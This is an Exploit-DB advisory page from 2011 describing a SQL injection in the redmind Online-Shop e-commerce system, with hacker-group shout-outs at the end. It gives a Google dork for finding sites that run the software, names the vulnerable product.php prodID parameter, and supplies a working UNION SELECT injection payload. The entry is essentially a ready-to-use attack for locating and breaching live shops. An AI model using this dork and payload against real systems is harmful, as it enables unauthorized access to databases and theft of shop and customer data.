redmind Online-Shop / E-Commerce-System - SQL Injection

EDB-ID:

17898

CVE:





Platform:

PHP

Date:

2011-09-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

[#] Exploit Title	: redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability
[#] Google Dork		: "powered by redmind�" or "Entwickelt und betrieben von redmind�"
[#] Software Link	: http://www.redmind.de/online-shop.html
[#] Version		: N/A
[#] Tested on		: Linux IDBlackcoder
[#] Date		: September 28th, 2011
[#] Author		: Mbah_Semar
[#] Homepage		: http://www.blackcoder.or.id | http://www.blackhat.or.id

#####################################################################[ Vulnerable File ]	http://www.example.com/product.php?prodID=[SQLi]
[ Example ]	http://www.example.com/product.php?prodID=9999 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
#####################################################################
[Thank's to][*] All member and Staff Indonesian Blackcoder[*] My Master : sudden_death (terimakasih atas ilmunya)[*] Special to ex member suramcrew: Kodok ijo, Gisa Maho, Lukas Bling, Pasukan dari Sempax, Zero-Line, Aanz, anharku, hakz
[Note][*] Aku sayang Ibu :)